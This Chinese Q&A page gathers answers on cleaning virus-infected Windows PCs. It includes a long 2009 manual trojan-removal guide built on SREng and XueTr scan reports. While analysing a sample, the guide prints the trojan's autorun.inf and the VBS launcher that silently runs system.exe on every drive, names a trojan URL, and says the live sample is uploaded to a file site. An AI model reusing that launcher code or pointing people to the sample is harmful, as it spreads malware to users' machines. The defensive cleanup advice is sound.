电脑中病毒啊

电脑中病毒怎么办啊 急！~

电脑中了文件夹病毒解决办法：
1、如果杀毒软件是升级是在半年左右的时间内升级的，那到恭喜，电脑还有救，赶紧重启进入安全模式杀毒，当然还可以下载顽固木马清除软件来清除，还可以通过安全卫士来清除。
2、如果进入不了安全模式，也没关系，可以在系统中直接启动杀毒软件的全盘杀毒功能，同时启用顽固木马清除，两个同开，那么病毒最终也能被清除。清除之后有时候会有一个后遗症，那就是隐藏的文件夹无法显示，即使我们在文件夹选项里去设置显示所有隐藏文件也没有用，因为你会发现你改了，点了确定后它又被改回不显示了。此时就要看下一个步骤了。
3、在运行栏里输入"regedit"打开注册表编辑器，打开如下位置
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden]
4、问题出现在CheckedValue这个键上，可以双击它，将它的值改为1，然后再从文件夹选项里显示被隐藏的文件，这里被隐藏的文件就可以正确显示出来。
5、去掉被隐藏的文件夹的隐藏属性。选择文件夹，点右键显示文件夹属性，将文件夹的隐藏属性前的勾去掉，然后确定，在弹出的是否影响子文件夹时，我们选择上面的不影响子文件夹即可。

您好，
能进入安全模式么？如果可以的话
建议您立即断开网络，进入安全模式，在安全模式下查毒更彻底
使用腾讯电脑管家对您的电脑进行全面杀毒
方法：
立即断开网络，重启电脑按F8进入安全模式打开电脑管家——杀毒检查引擎是否正常开启选择全盘查杀重启电脑正常进入系统重复上述步骤


平时您需要注意以下几点：不要安装陌生人传送的程序；不要点击陌生链接；
不浏览危险网站；
安装杀毒软件；
您直接点击腾讯电脑管家官网下载最新版的腾讯电脑管家安装即可
希望可以帮到您，望采纳
腾讯电脑管家企业平台：http://zhidao.baidu.com/c/guanjia/

看问答篇第3问，

此篇写于2009/07/18，从晚上10点开始到凌晨4点，但当时是中毒状态，一边杀毒一般写，结果本来都写好了，但操作时IE崩溃了，12点后的我没保存，全部没了，当时心痛，真的很痛，19号有事外出，没写，今天补上，红色部分为木马或特别说明，淡红色为说明，请看完这篇文后再实践，总结在最后，记得要先看

第一篇，工具篇

去下sreng，xuetr，wsyscheck0116中文版，process explorer，没有去网上下，没网用U盘拷，没U盘，没U盘也继续看

sreng

http://www.kztechs.com/sreng/download.html

xuetr

http://www.linxer.cn/

wsyscheck0116中文版

http://www.crsky.com/soft/11054.html

process explorer

www.newhua.com

第二篇 准备篇

一，判断电脑中是什么类型的木马，有没有autorun，有没有映像劫持，有没有dll插入，有没有驱动启动。

1，有无autorun

看各个盘下有无autorun.inf文件，文本格式的，系统隐藏属性，看不见，工具-文件夹选项-查看-隐藏受保护的操作系统文件（推荐） 去√，显示所有文件和文件夹。打点，隐藏已知文件扩展名，去√，

没有，过；有，删了又有，过；设置不能改，过；中毒中，当然不让你改。

2，有无映像劫持，

用sreng看，在 启动项目-注册表，下来有IFEO，红色的，恭喜，被劫持了，删不了吧；用xuetr看，映像劫持 那里，有，删里刷新又出来，还是删不了吧；在注册表里看，运行RegEdit，打不开，提示被管理员禁用，放下，用xuetr上面的打开，杀完毒在解决，怎么解决，我不知道，直接百度，在 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options 里面就是映像劫持了，能删你就删，能不能我不知道，没试过。

3，有无dll插入，

用sreng2的智能扫面，看报告里的东西，标记为有N/A，[ ]，file ismissing，这些标有有可能是exe，dll，fon，sys等格式的，有且很多 又百度不到说明，恭喜你，中了，用xuetr同样可以，打开xuetr，如果提示有线程注入，点是就行，你随便点个进程，木马特喜欢插explorer这个进程，就点它好了，右键-查看进程模块，你会发现很多没有文件厂商说明的数字字母命名的dll，fon格式的东西，再次恭喜你，中了。QQ也是木马喜欢插的一个。

4，有无木马驱动，

用sreng查看，点→启动项目→服务→，在win32和驱动里面找吧，名字怪怪的，数字字母混合的有没有啊?有的话，中了，记得隐藏已认证的微软项目哦，不然那么多够你看的，当你点注册表那项时提示你appInit_dlls，不是默认值时，差不多也是中了，sreng看不太明白，看xuetr打开xuetr，打开过的就别打开了，在服务那找，没文件厂商的，名字怪怪的，比sreng看起来好多了吧，信息很全了，在道内核模块那找，找什么？没什么什么的呀，上面说过就忘了。

第二篇到此结束，谢谢观赏

第三篇 问答篇

1，问：安全模式进不去怎么办？蓝屏？没反应？

答：用sreng修复功能，那有，找不到别找我，修改注册表参照修 复安全模式篇，不再这里，是另一篇文章，还没写

2，exe，com，bat等可执行文件打不开怎么办？

答：你用sreng修复啊!不说打不开了吗?忘了，不好意思（~O(∩_∩)O~）。

方法1，改名字，exe运行不了该成.com，.com运行不了改成.bat，bat运行不了改成.cmd，还运行不了啊？看方法2吧；

方法2，打开程序，打开选择那选→从列表中选择程序→选windows command processor，也就是cmd，没有去windows\system32下找，这样你发先打开cmd窗口了吧，不要问我为什么能打开cmd.exe，我也不知道，问比尔盖茨去，有cmd就好办了，在cmd里输入assoc .exe=exefile，enter键，输 ftype exefile="%1" %*，exe程序能运行了，类推就是com了，等等，等等，能运行exe程序你该笑了吧，没cmd看方法3去，

方法3，没cmd找别人借个，U盘不用我借你吧；用安装盘进windows PE系统，操作方法如2，PE进去找不到硬盘看方法4

方法4，除了重装系统外的所有方法，暂时没想到，

方法5，刚想到的，系统装到其他分区去，用这个系统启动杀木马就行了，适合有重要资料的人使用，没必要就格了吧，省事

3，杀毒软件打不开怎么办？首页被改怎么办？输关键字如“杀毒”网页自动关怎么办？

答：参照 准备篇，问答篇第2问，中毒了吗？中了像下看，肯定中了的啦！！

4，我电脑中了！求高手帮忙解决或我电脑中毒了怎么办啊！！？？百度知道常见问题。

答：我的回答，杀毒，或就你那十来个字，我总结出三个字：不知道，再或贴sreng扫描报告，结果没一个贴的，我失望，只好天天去挣2分去了，

在此认真回答，请把这篇文章看完，保证你有收获，不想看完的话扫sreng报告发到我邮箱里去只要我有空帮你看，282967372@163.com,等不及那就就格了重装或找有空的人，

5，什么是进程？什么的pid？什么是dll？什么是驱动？

答：去百度搜，我也说不清楚，简单比方说，程序是一穿衣服人的话，进程就一裸体人,PID就一身份证，dll（指木马）就一病毒细菌的干活，程序就是穿衣服的人，很多很像，可以一模一样，没人说你，进程就像双胞胎乃至多胞胎，总归有个数，PID就一身份证，一人一个，dll（指木马）就一寄生虫，在人体（程序）内活的，出来就死翘翘了；驱动（专指木马）就一异型，难找难宰，自己能活，还楞的装成个人，一不小心就放过去了；

6，为什么你会知道哪些是木马的进程/驱动/dll/fon？

答：我也不知道太阳离我们有多远，那是别人告诉我的，所以你要去百度找进程方面的资料，然后记下来，时间久了就知道了，也可以经常用sreng扫描报告对比，我经常这样做的

7，你不是说是手动杀毒吗？哪来那么多软件要用？

答：问你1+2+3+。。+100=？你是拿xp那个计算器加加加，得到5050呢还是下个软件直接输个1和100得到5050呢？简单问题复杂化。

8，你经常说免疫是怎么回事？

答：就建一个和木马同名的文件夹或文件，在里面在放个。。的文件，删不了就行

那个。。文件夹建法

我们以autorun免疫为例：运行里输cmd打开后输：

md c:\autorun.inf\autorun.inf..\ ，几个点随你，但要>=2，

md d:\autorun.inf\免疫...\ ，下面这个文件夹名字随便取， 啊！类推，你有几个盘就建几个

删除这样的文件夹直接在cmd里输rd c:\autorun.inf\autorun.inf..\

进入文件夹在运行里输 c:\autorun.inf\autorun.inf..\

9，出现comres.dll无法找到入口点怎么办？

答：这个一般是木马替换了原来的正常文件，如果出现对话框，你点点点，就没了，然后上网下comres.dll，在www.zhaodll.com下，放到c盘根目录下或Windows目录下，其他盘也行，不过建议放到C盘下，你放到system32目录下，不会让你放的，不信你放了就知道了，然后用regsvr32注册，命令是regsvr32 c:\comres.dll 这样重启电脑后所有的软件都用c盘下的这个comres.dll了，再去32目录下删了原来的复制正常的过去，再注册回去，就是regsvr32 c:\Windows\system32\comres.dll 。

方法2，用xuetr全局卸载这个dll，就能复制到32目录下了

10，你 啰嗦半天到底还杀不杀了？

答：现在就杀，现在就杀，不要吓我，我怕怕！！！

第四篇 动刀篇

实例：以为一网友杀毒并用其机器中的木马为基础讲解下，我现在机器可中中毒着，没用虚拟机的，杀不了我也要 格！ 格！ 格！

病毒名：system.exe ，释放文件为system.dll ，此dll文件用txt打开后都是乱码，但有http://j0v.io7f.com/10/count.txt，这个东西，都是木马程序，密码我搞不定，不会，真的！不会

在每个盘生成autorun.inf 和AutoRun.vbs和system.exe文件，autorun.inf内容为：

[AutoRun]
shellexecute=AutoRun.vbs
shell\Auto\command=AutoRun.vbs

就一简单执行AutoRun.vbs这个脚本程序，然后这个脚本程序又执行system.exe，脚本程序内容为：

set yu=wscript.createobject("wscript.shell")
yu.run "cmd /c start system.exe",0
yu.run "cmd /c start E:\",0 →c盘的就是C:\',0，d盘你知道了吧

这里就是典型的autorun木马了，这个system木马在每个盘下创建自己，你一不小心打开盘就中了，预防就关了自动播放，在每个盘下建个autorun.inf文件夹，

下面说system.exe还干了什么事，基本就是狂下木马，修改首页http://www.7241.cn/?q， 然后桌面不能用，explorer.exe被强奸了，下完就有桌面了，然后分析干什么事，

重启后没有桌面，但你等会就有了，用process explorer看的话会发现当explorer.exe下面蹦出rundll32.exe后桌面就出来，简单说就是explorer加载了rundll32.然后rundll32.exe加载木马，一会就出现xttp6j11x.exe，cmd.exe有3个，cmd不是木马，只是被调用了，一个iexplore.exe,IE知道吧，你没开网页也会有，不要搞忘了，一个1a1.exe，QQ登不上，有中奖消息提示你

总结下：进程出现

xttp6J11x.exe，在c:\windows\system32目录下

1a1.exe ,在c:\windows\system32目录下

iexplore.exe 被木马强奸的，结束就可以了不用删

cmd.exe 被木马强奸的，结束就可以了不用删,有3个，我这的是3个

QQ无法登陆，出现QQ中奖消息提示

上面说的都是基本症状，就是简单看出来的，下面我们用这几个软件看看，重点部分了，这里你搞明白了，以后你中毒就就会做了，

用sreng看，我直接扫描报告，把报告里面的部分东西贴上来，具体分析

启动项目 ，也就是软件上的那个启动项目里面的东西，更具体了，有一个正常的对比
注册表
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
<ctfmon.exe><C:\WINDOWS\system32\ctfmon.exe> [(Verified)Microsoft Windows Component Publisher] 有说明，此项对比用

[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]
<load><> [N/A] 这里通常什么都没有的注意了

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<system><C:\WINDOWS\system32\system.exe> [] ←我说的那个[ ] ,木马添加自启动项

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
<stup><C:\WINDOWS\system32\1a1.exe> []←我说的那个[ ] ,木马添加自启动项

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows]
<AppInit_DLLs><C:\WINDOWS\system32\a4rxQxCvNBMNnpqs.dll,> [] 木马
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
<{AB900155-F1F0-4165-9E73-67BC13BBCE89}><C:\WINDOWS\system32\xg4hAPNygs29.dll> []木马
<{22EEBD06-A251-44C3-BB16-426025319471}><C:\WINDOWS\system32\e999G49bN.dll> []木马

<{CEBB8F8A-308B-43E9-9789-B6FD6BE1BD97}><C:\WINDOWS\system32\v54M9wWBuNGTf2m.dll> []木马
<{76CBCF38-0583-44C7-A1AE-D463DFE625EC}><C:\WINDOWS\system32\skcfujQ5EDN.dll> []木马
<{76B9BA7A-81D0-4979-8598-8471F2AB5186}><C:\WINDOWS\system32\76B9BA7A.dll> []
<{9726072A-8039-4958-B609-565CF7A16B38}><C:\WINDOWS\system32\JPccCJnKygDdp3.dll> []
-B20E-0B656D450264}><C:\WINDOWS\system32\A0C86020.dll> []
<{F8C6B7B5-DAE0-4B78-BF2A-101C9A9CCA27}><C:\WINDOWS\system32\Va7SpUWgCA5f.dll> []
<{C1606DC4-C352-4B1F-A0B5-52DF3204E05D}><C:\WINDOWS\system32\up9fEkYRsKHT.dll> []木马
<{122B901E-493F-4AD9-BC69-7DE8C3E52FCC}><C:\WINDOWS\system32\122B901E.dll> []
<{41912A21-4337-4E99-8C30-80A8434B0793}><C:\WINDOWS\system32\zHvqM6hMxwpem.dll> []
<{11B10F7F-FB23-466D-BDC3-9591CF02EC17}><C:\WINDOWS\fonts\uXUsF2RrQy.fon> []
<{37C5D66A-8B1B-4545-8112-3751194F6A4A}><C:\WINDOWS\system32\taNjsFa2tT2Dh.dll> []
<{71C4F360-FF1E-413E-B17A-0CA267A78E97}><C:\WINDOWS\system32\qB5BKZy7vR5m.dll> []
<{23DA65D2-C696-4EE4-BEE8-B4841DEC3E30}><C:\WINDOWS\system32\ndxq9awMc.dll> []
<{A5CA6C70-7185-4466-AB45-B1C34E7A37CA}><C:\WINDOWS\system32\ed78ab9.dll> []
<{DA112397-5376-4E52-A333-A85284658DEA}><C:\WINDOWS\fonts\NPPVWvYEyCe8H.fon> []木马 fon格式的，这种我找不到源文件，

由于太多，我就不全部标记，也没贴全，毕竟这只是例子，大家自己找，自己判断，就找数字字母混合型，N/A,[ ] File is missing 的看自己了，最好记下来，后面有用，

启动文件夹 一般木马不会放这，但不排除也有
N/A

=========== =======================
服务

太多，就贴个正常的对比下，和木马
[Intel?PROSet/Wireless WiFi Service / S24EventMonitor][Running/Auto Start]
<C:\Program Files\Intel\WiFi\bin\S24EvMon.exe><Intel(R) Corporation> 无线网卡的，有说明
[xttp6J11x / xttp6J11x][Running/Auto Start]
<C:\WINDOWS\system32\xttp6J11x.exe><N/A> 上面提到的，在进程里的那个程序，此项可以直接在sreng那里删除后停止启动，xuetr也行。

驱动

驱动程序
[RAS Asynchronous Media Driver / AsyncMac][Stopped/Manual Start]
<system32\DRIVERS\asyncmac.sys><N/A> 对比5，6月份报告没有此项，但7月份有，无法判断是不是正常，我先放着了
[eamon / eamon][Running/Auto Start]
[ehdrv / ehdrv][Running/System Start]
<system32\DRIVERS\ehdrv.sys><N/A> 对比 5 6月份没有，7月份有，发现是ESET的，难道是因为是把360版换成官方版的缘故？

peio / peio][Running/Manual Start]
<\??\C:\WINDOWS\system32\Drivers\peios.sys><N/A> 对比567月都没有，暂时判断为木马

[yrgpvq / yrgpvq][Running/Boot Start]
<\SystemRoot\system32\drivers\lwtsg.sys><N/A> 不用对比，我直接判断为木马，服务名驱动名都是乱七八糟的，你不要问为什么，我的感觉，时间久了你也就能感觉了

正在运行的程序

我就贴两个个出来说明下，

[PID: 1264 / SYSTEM][C:\WINDOWS\system32\xttp6J11x.exe] [N/A, ] 那个木马，

标记看到了吗？system.exe没有运行，因为我重启后ESET的杀毒程序没启动，但服务启动了，估计被杀了，还有上面提到几个也都没有，

在这我要说下，不是广告不是托，ESET比瑞星强，我那网友开着瑞星我帮他QQ远程，进程里那几个木马都在，瑞星除了自保了，什么也没做，扫也扫不到，所以给大家的建议，装瑞星的还是卸了吧，再说一遍，我不是托，我的经历告诉我瑞星不行，不要和我辩，你可以选择继续用瑞星那个不咋地的杀软，

[PID: 1324 / IEXPLORE.EXE][IEXPLORE.EXE] [Microsoft Corporation, 7.00.6000.16791 (vista_gdr.081217-1620)]

插入型的木马，一般是dll文件，fon文件，插在IEXPLORE.EXE里

[C:\WINDOWS\system32\a4rxQxCvNBMNnpqs.dll] [N/A, ] 这个木马每个都插，厉害，也不怕身体受得了受不了，也点H吗？
[C:\WINDOWS\system32\UxTheme.dll] [Microsoft Corporation, 6.00.2900.5512 (xpsp.080413-2105)] 我正常的很
[C:\Documents and Settings\jly\Application Data\S3.dll] [N/A, ] 木马，
[C:\WINDOWS\system32\mtlrd.dll] [, 4.4.3.0]
[C:\WINDOWS\system32\COMRes.dll] [Microsoft Corporation, 2001.12.4414.42] 网友那个
COMRes.dll被木马替换还是感染什么的我说不好，但是网友的标记为N/A,肯定是木马了，就是最近流行的COMRes.dll找不到入口点什么的，我这个没有，奇怪，难道我长的帅？如果你的被替换，请参照问答篇

[C:\WINDOWS\fonts\YZefWbcSzhK6J.fon] [N/A, ] 木马 这个字库格式的木马我找不到路径，所以没的删除，但你按路径打的开，没办法我改了打开方式，让他用记事本打开，我只是想看看怎么找这个文件，在这说下，没什么意思，
[C:\WINDOWS\system32\JBn2ypqY23vWX.dll] [N/A, ]木马
[C:\WINDOWS\system32\taNjsFa2tT2Dh.dll] [N/A, ]木马
[C:\WINDOWS\fonts\uXUsF2RrQy.fon] [N/A, ]木马
[C:\WINDOWS\system32\Va7SpUWgCA5f.dll] [N/A, ]木马

[C:\WINDOWS\system32\08223B03.dll] [N/A, ] 木马
[C:\WINDOWS\fonts\xPjWNGd8cERq.fon] [N/A, ] 木马
[C:\WINDOWS\fonts\fyrwJf5Qfhh.fon] [N/A, ] 木马
[C:\WINDOWS\system32\704C3595.dll] [N/A, ] 木马
[C:\WINDOWS\fonts\zEfE48cw9EmcFaR.fon] [N/A, ] 木马
[C:\WINDOWS\system32\Qh6xX7VN48sVPnK.dll] [N/A, ] 木马
[C:\WINDOWS\system32\JPccCJnKygDdp3.dll] [N/A, ] 木马
[C:\WINDOWS\system32\76B9BA7A.dll] [N/A, ] 木马
[C:\WINDOWS\system32\skcfujQ5EDN.dll] [N/A, ] 木马
[C:\WINDOWS\system32\e999G49bN.dll] [N/A, ] 木马
[C:\WINDOWS\system32\xg4hAPNygs29.dll] [N/A, ]木马
[C:\WINDOWS\system32\Mit47503109Lic.dll] [, 1, 0, 0, 1] 判断不好，放着了
[C:\WINDOWS\system32\up9fEkYRsKHT.dll] [N/A, ] 木马

我没有贴全，但你一定要找全，并记下名字，后面有用，现在可能会很繁琐，但以后就不会了，熟能生巧

下面的这两项有问题就修复下吧，杀毒后修复

Autorun.inf

HOSTS 文件

上面用sreng这个软件查看部分就结束了，如果你熟悉的话都可以处理了，但我没有处理，就是想一步一步说明，当你熟悉后，你自然知道怎么做了

xuetr功能使用说明 简单说明

这里我们就要操刀了。sreng只是辅助使用，xuetr才是主角，，补充：你可以用类似xuetr的工具，如冰刃，狙剑，等等，

首先打开xuetr，

本工具配置 ：这里可以全部√上，也可以不管，个人操作习惯问题。

映像劫持：里面有东西，试试删除，如果在本工具配置那都√上了，里面有东西你删除后刷新也不会再有了，如果你没配置，刷新后又有，可以不用管，杀完毒再删就没了

DCP定时器，不知道干什么的，没用过，不管

服务：找没文件厂商，没描述，名字怪怪的，知道怎么怪吧？这里一般都是Microsoft Corporation居多，还有显卡厂商，一些软件厂商，杀软，播放器厂商等等，要仔细看，我以前就看到个厂商叫computer is here的厂商，你告诉我这是不是木马，肯地是。，找到后根据sreng的报告选择删除或停止服务，建议用停止，因为有时不能判断，

其他的不说了，直接看内核那

内核模块：这里比较危险，删错容易蓝屏死机，所以要判断准确了，同样和服务那样找，xuetr.sys这个没厂商，这是xuetr自己的驱动，不要删了。 不确定的校验数字签名

进程：

建议值保留，其他都结束了

System Idle Process 系统空闲进程，级别高，没有映像路径
System 系统关键进程，映像路径 是system
smss.exe system32目录下，系统关键进程，
csrss.exe system32目录下，系统关键进程
winlogon.exe system32目录下，系统关键进程
services.exe system32目录下，系统关键进程
lsass.exe system32目录下，系统关键进程
svchost.exe system32目录下，系统关键进程，有几个留几个
wmiprvse.exe system32\wbem下，可能你的没有
explorer.exe windows目录下，简单说就是桌面，没了就没桌面，可以结束，没桌面不习惯，留着
ctfmon.exe system32目录下，输入法，没了没输入法，可以没有，不习惯？留着吧
XueTr.exe xuetr自己，任意目录下，看你放哪了

结束进程出现60秒倒计时关机时在运行里输入 shutdown -a 记得敲 回车键 或 点 确定，如果有杀毒进程的话也可以留着，

为什么留这几个进程？还记得木马喜欢插吗？进程少，你干活就少啊，并且把木马进程也结束了是吧

现在开始卸载dll，上面我们已经删除驱动和服务了还记得吗？卸载完dll就大功告成，杀软肯定能打开了，如果打不开，就是还有漏的，继续找，重复以上步骤，直到杀软能打开扫描杀毒为止

一个一个进程看，右键查看进程模块，找到我上面要你记下的那些N/A的吗？全局卸载，一般这些木马在这也是一样，没文件厂商，全局卸载过程中可能会出现桌面崩溃，软件崩溃，等等，不用管，只要不死机就行，记得最后卸载xuetr里面的，不然xuetr死了后你用任务管理器结束不了，要重启机器，那样你就白忙了

注意：有可能你会发现sreng扫描的标记为N/A，[ ] 那些，就是你记的那些，在xuetr看有文件厂商，你会奇怪为什么了，我也不明白，但一般你校验数字签名的话 没有签名就可以卸载了，但有的没文件厂商，你校验数字签名有签名的不要卸载

全部卸载完打开杀软，杀毒吧，

总结：我们可以看到木马的几个通性，名字怪，08223B03.dll 纯数字，xg4hAPNygs29.dll，xttp6J11x.exe，混合型，lwtsg.sys 没规律的字母组合，sreng扫描都是N/A, xuetr,看数字签名基本没有

peios.sys 这是木马，我上面无法判断，所以我停止服务，但没删，ESET 启动后扫到为木马并且隔离了

asyncmac.sys ，不是木马，ESET没报，查看文件有厂商，是微软的，网上检测 ，过了，没事

一般用xuetr是先结束进程，后停止服务，在删除内核的木马，上面是根据软件界面来的，但同样可行，

杀软启动后就可以把病毒木马杀了，只要你别用瑞星就行，

最后用xuetr修复映像劫持，这样你的很多软件就能打开了，sreng修复累死人，不建议用，修复HOSTs用sreng，xuetr不好用，此木马修改的首页也可以改回来了，，任务栏的快捷方式要点属性把后面的http://www.7241.cn/?q，删了

扫描sreng报告时最好关了网页，QQ，等所有软件，减少扫描内容方便大家看

那个木马我放到www.jlys.ys168.com里了，图片区，想玩的去下

中招了......进带网络的安全模式升级杀毒软件，大开杀戒吧~~~~

---

休宁县18420153525： 我的电脑怎么中病毒了啊？
拱娅怡邦： 所有上网的电脑都会中毒,一般有的不良网站上会挂有木马病毒,所以在浏览的时候木马和病毒就会自动运行.还有就是下载的文件也可能捆绑有木马和病毒.所以下载后应即使查毒. 建议快去下载一套完整的瑞星杀毒,而且网络监护要时时打开.

休宁县18420153525： 电脑中了病毒怎么办啊?？
拱娅怡邦： 一般情况下,电脑中毒或者中木马或者病毒之后,木马病毒都会破坏系统的,一般杀毒软件是不能解决这些问题的,推荐你使用360杀毒配合360安全卫士对系统进行修复,我就是这样解决问题的. 建议你安装专业的杀毒软件,推荐使用360杀毒,我正在使用这个,资源占用少,而且查杀速度快,效果也很好的.

休宁县18420153525： 电脑中病毒了,怎么办啊? - ？
拱娅怡邦： 1、备好启动软盘,并贴上写保护. 检查电脑的任何问题,或者是解毒,最好在没有病毒干扰的环境下进行,才能完整测出真正的原因,或是彻底解决病毒的侵入.因此,在安装系统之后,应该及时做一张启动盘,以备不时之需. 2、重要资料...

休宁县18420153525： 我电脑好像中病毒啊 - ？
拱娅怡邦： 广告弹出骚扰、恶意跳转链接和更改首页问题解决方案 :( 一 )手动办法:1、C:\Program Files\Internet Explorer到这里找到浏览器——〉发送到桌面快捷方式,用这个. 2、删除地址栏的快捷方式,也换成上面那个快捷方式(通过鼠标拖拽)...

休宁县18420153525： 电脑中病毒了.什么办啊 - ？
拱娅怡邦： 开始菜单-运行-输入msconfig回车 在里边的启动栏里把**.dll前面的勾去掉就行了 1、开始——运行——msconfig——启动——把加载项***.dll的那个勾勾去掉. 重启电脑,通常到这就可以了,如果还弹出来再进行 2 2、开始——运行——regedit ...

休宁县18420153525： 电脑中病毒怎么解决啊???？
拱娅怡邦： 我个人的建议啊 希望对你有所帮助 电脑中毒了啊 杀毒软件是很难把电脑病毒杀彻底的啊 而且你的杀毒软件很容易被病毒破坏而不能用 而且现在的病毒有好多都是免杀的 你最好的办法是把你的电脑系统重新装一下系统 然后把杀毒软件装上 再备...

休宁县18420153525： 电脑中病毒了怎么办啊?？
拱娅怡邦： 可能是中了AV终结者病毒. 1:杀软、防火墙被强制关闭 2:无法显示隐藏文件 3:无法进安全模式 4:搜索有关杀毒、病毒字眼立即自动关闭. 5:在每个盘下生成随机8位数字文件 如果你都符合,那你不幸的中了流行的AV终结者 专杀地址:...

休宁县18420153525： 电脑中病毒了怎么办啊.?？
拱娅怡邦： 电脑中病毒了怎么办啊.? 估计是中了AUTO木马群、磁碟机、AV终结者、机器狗或类似木马 一.中毒现象 病毒在移动设备或硬盘根目录下生成Autorun.inf文件,用户双击盘符即可激活病毒 关闭众多杀毒软件和安全工具 修改注册表,加载自启动...

休宁县18420153525： 电脑中病毒了要怎么弄啊 - ？
拱娅怡邦： 您好,建议您安装电脑管家最新版,并将病毒库升级至最新版,然后重新启动您的电脑,在开机过程中按F8进入安全模式,使用电脑管家对您的电脑进行一次深入彻底的木马病毒查杀,如发现病毒请立即处理,稍后正常重启机器即可.如无法启动管家,请插入系统盘引导开机重做系统.安全提示,为了电脑系统的安全,下载或接收文件后一定要先使用电脑管家查杀无异常以后再打开.希望帮助到您,电脑管家竭诚为您服务,您的支持是我们的动力,望采纳.管家下载地址 腾讯电脑管家官网 腾讯电脑管家企业平台:http://zhidao.baidu.com/c/guanjia/

休宁县18420153525： 我的电脑老是中病毒怎么办啊？
拱娅怡邦： 要想不中毒,从预防开始! 恶性程序码的类别中,电脑病毒和蠕虫是较具破坏力,因为它们有复制的能力,从而能够感染远方的系统.电脑病毒一般可以分成下列各类: 1.引导区电脑病毒 2. 文件型电脑病毒 3. 复合型电脑病毒 4.宏病毒 5. 特洛...